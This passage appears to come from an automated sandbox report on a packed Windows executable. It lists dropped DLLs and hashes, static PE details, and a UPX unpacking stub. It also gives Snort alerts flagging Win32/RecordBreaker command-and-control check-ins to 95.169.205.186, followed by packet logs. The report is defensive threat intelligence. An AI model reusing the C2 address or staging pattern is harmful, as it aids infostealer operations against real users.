                                                              Encrypted:false
                                                              SSDEEP:6144:uI7A8DMhFE2PlKOcpHSvV6x/CHQyhvs277H0mhWGzTdtb2bbIFxW7zrM2ruyYz+h:uI7A8DMhFE2PlbcpSv0x/CJVUmhDzTvS
                                                              MD5:63A1FE06BE877497C4C2017CA0303537
                                                              SHA1:F4F9CBD7066AFB86877BB79C3D23EDDACA15F5A0
                                                              SHA-256:44BE3153C15C2D18F49674A092C135D3482FB89B77A1B2063D01D02985555FE0
                                                              SHA-512:0475EDC7DFBE8660E27D93B7B8B5162043F1F8052AB28C87E23A6DAF9A5CB93D0D7888B6E57504B1F2359B34C487D9F02D85A34A7F17C04188318BB8E89126BF
                                                              Malicious:false
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                              • Antivirus: Virustotal, Detection: 0%, Browse
                                                              Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...'.9b.........."!......................................................................@A........................tv..S....w...................................5..hq..............................................D{...............................text...V........................... ..`.rdata..............................@..@.data................~..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                                                              C:\Users\user\AppData\LocalLow\sqlite3.dll

                                                              Download File
                                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):1099223
                                                              Entropy (8bit):6.502588297211263
                                                              Encrypted:false
                                                              SSDEEP:24576:9jxwSkSteuT4P/y7HjsXAGJyGvN5z4Rui2IXLbO:9Vww8HyrjsvyWN54RZH+
                                                              MD5:DBF4F8DCEFB8056DC6BAE4B67FF810CE
                                                              SHA1:BBAC1DD8A07C6069415C04B62747D794736D0689
                                                              SHA-256:47B64311719000FA8C432165A0FDCDFED735D5B54977B052DE915B1CBBBF9D68
                                                              SHA-512:B572CA2F2E4A5CC93E4FCC7A18C0AE6DF888AA4C55BC7DA591E316927A4B5CFCBDDA6E60018950BE891FF3B26F470CC5CCE34D217C2D35074322AB84C32A25D1
                                                              Malicious:false
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                              • Antivirus: Virustotal, Detection: 0%, Browse
                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...".,b.v.........!......................... .....a......................................... .........................n*................................... ...;...................................................................................text...............................`.P`.data...|'... ...(..................@.`..rdata...D...P...F...:..............@.`@.bss....(.............................`..edata..n*.......,..................@.0@.idata..............................@.0..CRT....,...........................@.0..tls.... ...........................@.0..rsrc...............................@.0..reloc...;... ...<..................@.0B/4......8....`......................@.@B/19.....R....p......................@..B/31.....]'...@...(..................@..B/45......-...p......................@..B/57.....\............&..............@.0B/70.....#............2..

                                                              C:\Users\user\AppData\LocalLow\vcruntime140.dll

                                                              Download File
                                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):80128
                                                              Entropy (8bit):6.906674531653877
                                                              Encrypted:false
                                                              SSDEEP:1536:l9j/j2886xv555et/MCsjw0BuRK3jteopUecbAdz86B+JfBL+eNv:l9j/j28V55At/zqw+IqLUecbAdz8lJrv
                                                              MD5:1B171F9A428C44ACF85F89989007C328
                                                              SHA1:6F25A874D6CBF8158CB7C491DCEDAA81CEAEBBAE
                                                              SHA-256:9D02E952396BDFF3ABFE5654E07B7A713C84268A225E11ED9A3BF338ED1E424C
                                                              SHA-512:99A06770EEA07F36ABC4AE0CECB2AE13C3ACB362B38B731C3BAED045BF76EA6B61EFE4089CD2EFAC27701E9443388322365BDB039CD388987B24D4A43C973BD1
                                                              Malicious:false
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                              • Antivirus: Virustotal, Detection: 0%, Browse
                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L....(.[.........."!.........................................................0......t(....@A.............................................................?... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

                                                              C:\Users\user\AppData\LocalLow\zfjxW18OG6vD

                                                              Download File
                                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                              File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 1280x1024, components 3
                                                              Category:dropped
                                                              Size (bytes):91927
                                                              Entropy (8bit):7.8564167702606955
                                                              Encrypted:false
                                                              SSDEEP:1536:CMQzGPxhhGncafgn/cF9aaZmt4WEEA8p2RMovCTXBZTZLQZtT54/tgcXZkV/Mk0i:YzGZhcncpskeSE4p4vCTFL+54/tXm/M+
                                                              MD5:510640FA9CE8CCDB3CC826400FDE99CD
                                                              SHA1:2AF08FB1AD7125CD12B89B6F76ED26B5BCD83BD2
                                                              SHA-256:F75DA4426B50EAFBD4644F534340E3CAC3612338553C1D756160994328BB28E5
                                                              SHA-512:CC6AA70C08E7CB3459CC30801F8C89D2112D92115151474D243CCF597533E9EC942C9A52D89409F56052562E46243360218EA942565F2E3528608E18B9D867FB
                                                              Malicious:false
                                                              Preview:......JFIF.....`.`.....C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...(..?3.*..m..,.X.c.#....O.*.i.....w...._.#.*bi.F.xJ.5KC"...N...m.g....Uf.....?.2......Q.]9o..s......T..W6.y.:.....CPWJi......%-....Z(.(..o.<-...OF.....j.#?........x..........#..........9.+..........e\.../n-.n.dh.c...k....1.q...y5..r..N.)W...O.d.QEw.!E.P11E-u>....k..V6....#..e...?)....^~a...b.y.}....G...1.%79.F.....W_.9Z+....]xW.._.1/...G.+.....+..&%........

                                                              Static File Info

                                                              General

                                                              File type:PE32+ executable (console) x86-64, for MS Windows
                                                              Entropy (8bit):7.933959484828319
                                                              TrID:
                                                              • Win64 Executable Console (202006/5) 81.26%
                                                              • UPX compressed Win32 Executable (30571/9) 12.30%
                                                              • Win64 Executable (generic) (12005/4) 4.83%
                                                              • Generic Win/DOS Executable (2004/3) 0.81%
                                                              • DOS Executable Generic (2002/1) 0.81%
                                                              File name:60lAWJYfsL.exe
                                                              File size:1'073'152 bytes
                                                              MD5:f7f6eb480fe715733e509d0489171c18
                                                              SHA1:e28a03d8c62eae2687d8d8f6b6ccb73377bc1a48
                                                              SHA256:3898534fa62f5a8f169c66900f183e5637e7c4f9be8c46591568ff489bc432d4
                                                              SHA512:962a440c8b5e148821e5db065bddcf861899667319ff1d3ad497e7629c6212235e51d1902d4685af6248f83f7c4a8a1c2dc9805f58c5a27a87a40067e5792988
                                                              SSDEEP:24576:BW9a/w9mj+Nhf+x+eswsX08cjwPBXMX7pCeg8nr5G79Bgx+:BWYWNQUe3sX0OPuXV1vnAwx+
                                                              TLSH:163533E75762F2F6E88745BDC121A685E87AB10FC54324A1BA71C8CED1B43D51C8B32B
                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Dg&...H...H...H..yM...H..yL...H..yK...H..~....H.K~I...H...I...H.8.K...H.8.L...H...H...H.8.M.>.H.9.H...H.9.J...H.Rich..H........

                                                              File Icon

                                                              Icon Hash:90cececece8e8eb0

                                                              Static PE Info

                                                              General

                                                              Entrypoint:0x1402dbc60
                                                              Entrypoint Section:UPX1
                                                              Digitally signed:false
                                                              Imagebase:0x140000000
                                                              Subsystem:windows cui
                                                              Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                              DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                              Time Stamp:0x668843BB [Fri Jul 5 19:04:27 2024 UTC]
                                                              TLS Callbacks:
                                                              CLR (.Net) Version:
                                                              OS Version Major:6
                                                              OS Version Minor:0
                                                              File Version Major:6
                                                              File Version Minor:0
                                                              Subsystem Version Major:6
                                                              Subsystem Version Minor:0
                                                              Import Hash:7cb37de62912478a2e91ceb50989c83e

                                                              Entrypoint Preview

                                                              Instruction
                                                              push ebx
                                                              push esi
                                                              push edi
                                                              push ebp
                                                              dec eax
                                                              lea esi, dword ptr [FFEFB395h]
                                                              dec eax
                                                              lea edi, dword ptr [esi-001D6000h]
                                                              dec eax
                                                              lea eax, dword ptr [edi+002BC6ECh]
                                                              push dword ptr [eax]
                                                              mov dword ptr [eax], 5600168Eh
                                                              push eax
                                                              push edi
                                                              xor ebx, ebx
                                                              xor ecx, ecx
                                                              dec eax
                                                              or ebp, FFFFFFFFh
                                                              call 00007F3B88C89765h
                                                              add ebx, ebx
                                                              je 00007F3B88C89714h
                                                              rep ret
                                                              mov ebx, dword ptr [esi]
                                                              dec eax
                                                              sub esi, FFFFFFFCh
                                                              adc ebx, ebx
                                                              mov dl, byte ptr [esi]
                                                              rep ret
                                                              dec eax
                                                              lea eax, dword ptr [edi+ebp]
                                                              cmp ecx, 05h
                                                              mov dl, byte ptr [eax]
                                                              jbe 00007F3B88C89733h
                                                              dec eax
                                                              cmp ebp, FFFFFFFCh
                                                              jnbe 00007F3B88C8972Dh
                                                              sub ecx, 04h
                                                              mov edx, dword ptr [eax]
                                                              dec eax
                                                              add eax, 04h
                                                              sub ecx, 04h
                                                              mov dword ptr [edi], edx
                                                              dec eax
                                                              lea edi, dword ptr [edi+04h]
                                                              jnc 00007F3B88C89701h
                                                              add ecx, 04h
                                                              mov dl, byte ptr [eax]
                                                              je 00007F3B88C89722h
                                                              dec eax
                                                              inc eax
                                                              mov byte ptr [edi], dl
                                                              sub ecx, 01h
                                                              mov dl, byte ptr [eax]
                                                              dec eax
                                                              lea edi, dword ptr [edi+01h]
                                                              jne 00007F3B88C89702h
                                                              rep ret
                                                              cld
                                                              inc ecx
                                                              pop ebx
                                                              jmp 00007F3B88C8971Ah
                                                              dec eax
                                                              inc esi
                                                              mov byte ptr [edi], dl
                                                              dec eax
                                                              inc edi
                                                              mov dl, byte ptr [esi]
                                                              add ebx, ebx
                                                              jne 00007F3B88C8971Ch
                                                              mov ebx, dword ptr [esi]
                                                              dec eax
                                                              sub esi, FFFFFFFCh
                                                              adc ebx, ebx
                                                              mov dl, byte ptr [esi]
                                                              jc 00007F3B88C896F8h
                                                              lea eax, dword ptr [ecx+01h]
                                                              jmp 00007F3B88C89719h
                                                              dec eax
                                                              inc ecx
                                                              call ebx
                                                              adc eax, eax
                                                              inc ecx
                                                              call ebx
                                                              adc eax, eax
                                                              add ebx, ebx
                                                              jne 00007F3B88C8971Ch
                                                              mov ebx, dword ptr [esi]
                                                              dec eax
                                                              sub esi, FFFFFFFCh
                                                              adc ebx, ebx
                                                              mov dl, byte ptr [esi]
                                                              jnc 00007F3B88C896F6h
                                                              sub eax, 03h
                                                              jc 00007F3B88C8972Bh
                                                              shl eax, 08h

                                                              Rich Headers

                                                              Programming Language:
                                                              • [IMP] VS2008 SP1 build 30729

                                                              Data Directories

                                                              NameVirtual AddressVirtual Size Is in Section
                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x2aaf900x58UPX1
                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x2dd5400x380.rsrc
                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x2dd0000x540.rsrc
                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x2be0000x17748UPX1
                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x2dd8c00x2c.rsrc
                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_TLS0x2dbef00x28UPX1
                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x2dc0380x140UPX1
                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                              Sections

                                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                              UPX00x10000x1d60000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                              UPX10x1d70000x1060000x105200df125202b06bad487a368c763d71c4c0False0.9839215458951651data7.9357444590327155IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                              .rsrc0x2dd0000x10000xa00c4a3737647442058051b8a5da38f10acFalse0.382421875data4.049058193294843IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                                                              Resources

                                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                                              RT_VERSION0x2dd0a40x2acdata0.43567251461988304
                                                              RT_MANIFEST0x2dd3540x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                                                              Imports

                                                              DLLImport
                                                              ADVAPI32.dllRegCloseKey
                                                              api-ms-win-crt-convert-l1-1-0.dllstrtoull
                                                              api-ms-win-crt-heap-l1-1-0.dllfree
                                                              api-ms-win-crt-locale-l1-1-0.dll_configthreadlocale
                                                              api-ms-win-crt-math-l1-1-0.dllpow
                                                              api-ms-win-crt-runtime-l1-1-0.dllexit
                                                              api-ms-win-crt-stdio-l1-1-0.dll_set_fmode
                                                              api-ms-win-crt-string-l1-1-0.dllstrcmp
                                                              bcrypt.dllBCryptGenRandom
                                                              KERNEL32.DLLLoadLibraryA, ExitProcess, GetProcAddress, VirtualProtect
                                                              ole32.dllCoTaskMemFree

                                                              Network Behavior

                                                              Snort IDS Alerts

                                                              TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                              07/06/24-04:21:57.867496TCP2036955ET TROJAN Win32/RecordBreaker CnC Checkin - Server Response804973095.169.205.186192.168.2.4
                                                              07/06/24-04:21:57.171740TCP2036934ET TROJAN Win32/RecordBreaker CnC Checkin M14973080192.168.2.495.169.205.186

                                                              Network Port Distribution

                                                              TCP Packets

                                                              TimestampSource PortDest PortSource IPDest IP
                                                              Jul 6, 2024 04:21:57.166495085 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:57.171518087 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:57.171598911 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:57.171740055 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:57.176532030 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:57.867496014 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:57.867513895 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:57.867525101 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:57.867568016 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:57.867594957 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:57.867595911 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:57.867608070 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:57.867618084 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:57.867630005 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:57.867635012 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:57.867651939 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:57.867681026 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:57.874243975 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:57.879005909 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.174139977 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.174165964 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.174176931 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.174194098 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:58.174221992 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:58.174263954 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.174284935 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.174302101 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:58.174329042 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:58.174382925 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.174427032 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:58.174443960 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.174483061 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:58.174966097 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.175002098 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:58.175023079 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.175033092 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.175065041 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:58.175091982 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:58.175331116 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.175371885 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:58.175371885 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.175386906 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.175414085 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:58.175431013 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:58.175504923 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.175544977 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:58.266794920 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.266836882 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.266849041 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.266853094 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:58.266872883 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:58.266891003 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:58.266940117 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.266952038 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.266978025 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:58.266992092 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:58.267273903 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.267318964 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:58.267343998 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.267354012 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.267390013 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:58.267412901 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.267455101 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:58.267720938 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.267765045 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:58.267771959 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.267782927 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.267810106 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:58.267900944 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.267911911 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.267942905 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:58.267966032 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:58.268594027 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.268639088 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:58.268656969 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.268666983 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.268699884 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:58.268799067 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.268810034 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.268846989 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:58.269444942 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.269490004 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:58.269495010 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.269506931 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.269534111 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:58.269547939 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:58.269658089 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.269668102 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.269706011 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:58.270313025 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.270359039 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:58.359067917 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.359122992 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.359133005 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.359143019 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:58.359159946 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:58.359224081 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.359273911 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:58.359354973 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.359401941 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:58.359431982 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.359441996 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.359478951 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:58.359603882 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.359613895 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.359622955 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.359652042 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:58.359667063 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:58.359915018 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.359963894 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:58.359986067 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.359997034 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.360034943 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:58.360075951 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.360124111 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:58.360295057 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.360344887 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:58.360373020 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.360383034 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.360418081 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:58.360539913 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.360551119 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.360559940 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.360591888 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:58.360605955 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:58.360944986 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.360999107 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:58.361006975 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.361017942 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.361052990 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:58.361155033 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.361166000 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.361176014 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.361186981 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.361203909 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:58.361224890 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:58.361387014 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.361438990 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:58.361831903 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.361875057 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.361880064 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:58.361886978 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.361921072 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:58.361936092 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:58.362061977 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.362072945 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.362082958 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.362097025 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.362112999 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:58.362135887 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:58.362293959 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.362340927 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:58.362752914 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.362797976 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:58.362802982 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.362816095 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.362849951 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:58.362988949 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.362999916 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.363008976 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.363020897 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.363042116 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:58.363059998 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:58.363209963 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.363255978 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:58.363615036 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:58.363662004 CEST4973080192.168.2.495.169.205.186
